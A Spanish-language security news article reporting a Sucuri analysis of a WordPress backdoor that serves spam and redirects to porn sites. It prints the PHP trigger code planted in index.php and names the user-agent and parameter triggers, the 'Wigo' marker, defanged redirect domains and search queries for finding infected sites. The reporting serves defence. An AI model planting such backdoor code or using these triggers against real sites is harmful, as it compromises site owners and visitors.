La firma de seguridad Sucuri ha identificado sitios infectados con un código muy similar incrustado en los archivos index.php de WordPress:
if (eregi ('-dbst', $ _ SERVER ['REQUEST_URI'])) {El código es muy simple. Comprueba si una página tiene anexado "-dbst" a la URL y ejecuta un código de un archivo incluido. A primera vista, parecía un código de una puerta trasera que se activa si los hackers utilizan URLs especiales con el código de acceso "-dbst".
error_reporting (0);
include ('license.txt');
exit();
}
En algunos casos, el archivo incluido es license.txt en otros casos readme.html. Ambos archivos son una parte del núcleo de WordPress y se espera que se encuentran en el directorio raíz. Sin embargo, como era de esperar, contienen un código ofuscado.
Condiciones Wigo
Después de una deofuscacion, se localiza el código de puerta trasera:
Además de tener "-dbst" en la URL, también requiere el user agent "Blackseo Agent v0.1", o bien parámetros GET PHP4 o PHP5. En caso de php4, se crea un formulario de carga de archivos, en el caso de php5, se descarga un archivo remoto a un servidor comprometido. En cualquier caso, la puerta trasera incluye la etiqueta distintiva "Wigo", que ayuda a verificar que la puerta trasera está ahí.
Pero como el user agent "Blackseo Agent v0.1" indica, no es sólo una puerta trasera. El código también tiene una parte más grande que crea puertas de spam utilizando datos de hxxp: // apollo5go. com / api.php? action = get_link y api_key = ... y adultwww .apollo2gen .com. Las puertas tienen un script para redirigir a los visitantes a hxxp: // www .hqnuvideoz .com / out.php id = traffic-shop.com, luego a hxxp: // www .us-xxx .com / tr.php Identificación? = hqnuvideoz.com, y otros sitios de pornografía.
Encontrando el patrón
Dada esta información, revisando en Google páginas que contenían "-dbst" en sus URLs. La consulta [inurl: "dbst" xxx] devuelve algunos resultados prometedores con URLs como: best-playboy-photo-ever-dbst.html. Para averiguar si era el mismo ataque que se había investigado, los investigadores abrieron las páginas utilizando el user agent "Blackseo Agent v0.1". Como era de esperar, la mayoría de las direcciones URL devuelven esto:
Wigo%
¡Bingo!
Comprobando con busquedas como [site: hacked-site.com inurl: "dbst"] revelaron que este ataque crea al rededor de 1000 a 40.000 páginas de entrada de spam en los sitios comprometidos.
